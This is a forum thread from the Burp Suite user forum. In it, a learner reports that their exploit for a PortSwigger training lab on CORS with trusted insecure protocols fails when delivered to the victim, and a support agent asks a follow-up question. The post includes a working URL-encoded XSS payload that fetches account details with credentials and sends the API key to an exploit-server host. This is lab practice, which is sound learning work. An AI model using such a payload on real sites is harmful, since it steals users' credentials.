Burp Suite User Forum

Create new post

Faulty Lab: "CORS vulnerability with trusted insecure protocols"

Nemeses5174 | Last updated: Dec 30, 2023 03:22PM UTC

Hi, maybe there is bug inside the laboratory "CORS vulnerability with trusted insecure protocols". The following exploit script works with Burp's Chrome: <script> document.location = "https://stock.[LAB-ID].web-security-academy.net/?storeId=hi&productId=%27%3Cscript%3E+function+submitRequest%28%29+%7B+var+xhr+%3D+new+XMLHttpRequest%28%29%3B+xhr.open%28%22GET%22%2C+%22https%3A%5C%2F%5C%2F[LAB-ID].web-security-academy.net%5C%2FaccountDetails%22%2C+true%29%3B+xhr.withCredentials+%3D+true%3B+xhr.onload+%3D+%28%29+%3D%3E+%7B+document.location+%3D+%22https%3A%2F%2F[EXPLOIT-SERVER-ID].exploit-server.net%2F%3Fabcd%3D%22+%2B+xhr.responseText%3B+%7D%3B+xhr.send%28%29%3B+%7D+submitRequest%28%29%3B+%3C%2Fscript%3E%27" </script> The secret admin API-KEY will be recorded in the exploit server's log page. BUT the exploit script above does NOT work when I deliver it to the victim (the victim open the exploit page but the api-key is not recorded in the exploit-server's log page). If I use the solution code (very similar to the one above) everything works great. Maybe a bug in the laboratory? Have a good day.

Ben, PortSwigger Agent | Last updated: Jan 09, 2024 09:39AM UTC

Hi, To confirm, does your exploit work when you use the 'View exploit' functionality i.e. you land on the log page and your users API key is in the URL?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.